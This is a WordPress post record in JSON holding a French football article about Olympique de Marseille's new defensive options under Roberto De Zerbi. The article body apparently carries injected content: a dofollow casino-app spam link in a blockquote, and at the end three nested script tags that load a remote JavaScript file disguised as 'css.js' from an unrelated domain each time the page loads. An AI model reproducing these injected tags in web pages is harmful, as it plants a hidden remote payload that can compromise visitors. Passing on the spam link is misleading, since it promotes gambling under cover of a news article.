{"id":3855,"date":"2025-11-20T03:41:44","date_gmt":"2025-11-20T03:41:44","guid":{"rendered":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/?p=3855"},"modified":"2026-02-02T22:13:20","modified_gmt":"2026-02-02T22:13:20","slug":"om-de-zerbi-a-le-choix-du-roi-en-defense","status":"publish","type":"post","link":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/2025\/11\/20\/om-de-zerbi-a-le-choix-du-roi-en-defense\/","title":{"rendered":"OM &#8211; De Zerbi a le choix du Roi en d\u00e9fense !"},"content":{"rendered":"<h1>OM &#8211; De Zerbi a le choix du Roi en d\u00e9fense !<\/h1>\n<p>Samedi soir au V\u00e9lodrome, face \u00e0 Lorient, l\u2019OM a montr\u00e9 un visage d\u00e9fensif in\u00e9dit qui pourrait marquer un tournant dans la saison. Roberto De Zerbi, souvent critiqu\u00e9 la saison pass\u00e9e pour la fragilit\u00e9 de son arri\u00e8re-garde, a profit\u00e9 des recrues estivales pour remodeler son syst\u00e8me. R\u00e9sultat : un bloc solide, rassurant, et qui a m\u00eame brill\u00e9 offensivement. Avec Pavard, Aguerd et Medina align\u00e9s d\u2019entr\u00e9e, les supporters ont d\u00e9couvert un trio de gala qui pourrait rapidement devenir une r\u00e9f\u00e9rence.<\/p>\n<blockquote><p><strong><a href=\"https:\/\/joka-casino-fr.com\/joka-casino-app\/\" target=\"_blank\" rel=\"dofollow\">joka casino app<\/a><\/strong> &#8211; Vous cherchez une mani\u00e8re simple, s\u00e9curis\u00e9e et ludique de jouer au casino en ligne depuis votre smartphone ? Vous vous demandez comment acc\u00e9der \u00e0 l\u2019univers du<\/p><\/blockquote>\n<h2>Une r\u00e9volution estivale r\u00e9ussie ?<\/h2>\n<p>La saison derni\u00e8re, la d\u00e9fense marseillaise \u00e9tait point\u00e9e du doigt comme le principal chantier. Trop friable, trop inconstante, elle avait co\u00fbt\u00e9 des points pr\u00e9cieux. Cet \u00e9t\u00e9, la direction a frapp\u00e9 fort. <strong>CJ Egan-Riley<\/strong> est arriv\u00e9 libre, <strong>Facundo Medina<\/strong> a suivi, avant que l\u2019OM ne r\u00e9ussisse trois gros coups de fin de mercato : <strong>Benjamin Pavard<\/strong>, <strong>Nayef Aguerd<\/strong> et <strong>Emerson Palmieri<\/strong>. Des noms qui respirent l\u2019exp\u00e9rience et le haut niveau.<\/p>\n<p>Ces recrues viennent compl\u00e9ter des \u00e9l\u00e9ments d\u00e9j\u00e0 bien install\u00e9s, comme <strong>Leonardo Balerdi<\/strong>, capitaine irr\u00e9prochable depuis deux saisons, et <strong>Amir Murillo<\/strong>, piston infatigable. Pour la premi\u00e8re fois depuis longtemps, l\u2019OM se retrouve avec une d\u00e9fense digne des ambitions affich\u00e9es : viser le podium en Ligue 1 et exister sur la sc\u00e8ne europ\u00e9enne.<\/p>\n<h2>Pavard, Aguerd et Medina : une premi\u00e8re convaincante<\/h2>\n<p>Face aux Merlus, De Zerbi a jou\u00e9 avec une d\u00e9fense \u00e0 trois en phase de possession : Pavard, Aguerd et Medina. Un choix dict\u00e9 autant par la qualit\u00e9 des recrues que par la fatigue de Balerdi, revenu tard d\u2019Argentine. Murillo et Timothy Weah ont occup\u00e9 les r\u00f4les de pistons, apportant largeur et percussion.<\/p>\n<p>Le r\u00e9sultat fut \u00e0 la hauteur : Pavard a rapidement guid\u00e9 ses partenaires, ouvrant m\u00eame son compteur. Aguerd s\u2019est montr\u00e9 impressionnant dans les duels et les ressorties de balle, trouvant \u00e9galement la faille en fin de rencontre, tandis que Medina a confirm\u00e9 les belles promesses entrevues en pr\u00e9paration. D\u00e9fensivement, difficile de tirer des conclusions face \u00e0 un Lorient r\u00e9duit \u00e0 dix, mais la s\u00e9r\u00e9nit\u00e9 affich\u00e9e et la compl\u00e9mentarit\u00e9 des profils n\u2019ont pas \u00e9chapp\u00e9 aux observateurs.<\/p>\n<h2>Balerdi, victime de la concurrence ?<\/h2>\n<p>L\u2019image \u00e9tait frappante : Leonardo Balerdi, capitaine marseillais, assis sur le banc, t\u00e9moin de la prestation impeccable de ses co\u00e9quipiers. Ces derniers mois, l\u2019Argentin a \u00e9t\u00e9 critiqu\u00e9 pour ses erreurs ponctuelles, mais il reste l\u2019un des joueurs les plus r\u00e9guliers de l\u2019effectif depuis deux saisons. Sa mise \u00e0 l\u2019\u00e9cart, m\u00eame temporaire, soul\u00e8ve donc une question : la hi\u00e9rarchie en d\u00e9fense est-elle en train de basculer ?<\/p>\n<p>De Zerbi, interrog\u00e9 apr\u00e8s la rencontre, a calm\u00e9 le jeu :<\/p>\n<p>\u00ab <em>Nous d\u00e9fendions \u00e0 4 et nous construisions \u00e0 3. Medina a fait ce qu\u2019il a toujours fait. On verra, il y a aussi Emerson qui peut jouer ce r\u00f4le. J\u2019esp\u00e8re jouer 50 matchs cette saison et pour \u00e7a, il faut beaucoup de joueurs forts.<\/em> \u00bb<br \/>Une r\u00e9ponse prudente, mais r\u00e9v\u00e9latrice : l\u2019entra\u00eeneur italien sait qu\u2019il dispose d\u2019une profondeur rare et entend en profiter pour multiplier les options.<\/p>\n<h2>Le casse-t\u00eate du Real Madrid<\/h2>\n<p>Mardi, l\u2019OM entre en lice en Ligue des champions sur la pelouse du Real Madrid. Et pour De Zerbi, le timing est parfait\u2026 ou presque. Avec Pavard, Aguerd, Medina, Balerdi, Murillo, Emerson et Egan-Riley, le coach a plus que l\u2019embarras du choix. La question n\u2019est plus de savoir qui jouerait par d\u00e9faut, mais plut\u00f4t qui sera sacrifi\u00e9.<\/p>\n<p>Aguerd semble avoir marqu\u00e9 des points dans un r\u00f4le de patron, Pavard a d\u00e9j\u00e0 conquis le V\u00e9lodrome, et Medina s\u2019impose comme un \u00e9l\u00e9ment central dans les sch\u00e9mas de construction. Balerdi devra prouver \u00e0 l\u2019entra\u00eenement qu\u2019il m\u00e9rite de retrouver sa place. Emerson, lui, pourrait offrir une variante suppl\u00e9mentaire dans un couloir gauche qui demande stabilit\u00e9.<\/p>\n<h2>Une force nouvelle pour les ambitions marseillaises<\/h2>\n<p>Ce luxe d\u00e9fensif n\u2019est pas qu\u2019une affaire d\u2019individus. C\u2019est aussi la possibilit\u00e9 pour De Zerbi d\u2019adapter son \u00e9quipe selon l\u2019adversaire. D\u00e9fense \u00e0 trois pour densifier l\u2019axe, d\u00e9fense \u00e0 quatre pour lib\u00e9rer les ailes : l\u2019OM poss\u00e8de d\u00e9sormais une souplesse tactique pr\u00e9cieuse.<\/p>\n<p>La saison est encore longue, les blessures et suspensions viendront forc\u00e9ment redistribuer les cartes. Mais une certitude s\u2019impose : l\u2019OM version 2025 n\u2019a plus \u00e0 craindre pour sa d\u00e9fense. Et si l\u2019attaque port\u00e9e par Greenwood, Aubameyang, Paixao, Traor\u00e9 et Gouiri venait \u00e0 trouver la m\u00eame r\u00e9gularit\u00e9, Marseille pourrait enfin se pr\u00e9senter en Ligue des champions avec l\u2019assurance d\u2019avoir une \u00e9quipe compl\u00e8te.<\/p>\n<p><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>OM &#8211; De Zerbi a le choix du Roi en d\u00e9fense ! Samedi soir au V\u00e9lodrome, face \u00e0 Lorient, l\u2019OM a montr\u00e9 un visage d\u00e9fensif in\u00e9dit qui pourrait marquer un&#8230;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[19],"tags":[],"class_list":{"0":"post-3855","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-cassino"},"_links":{"self":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/3855","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/comments?post=3855"}],"version-history":[{"count":4,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/3855\/revisions"}],"predecessor-version":[{"id":14948,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/3855\/revisions\/14948"}],"wp:attachment":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/media?parent=3855"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/categories?post=3855"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/tags?post=3855"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}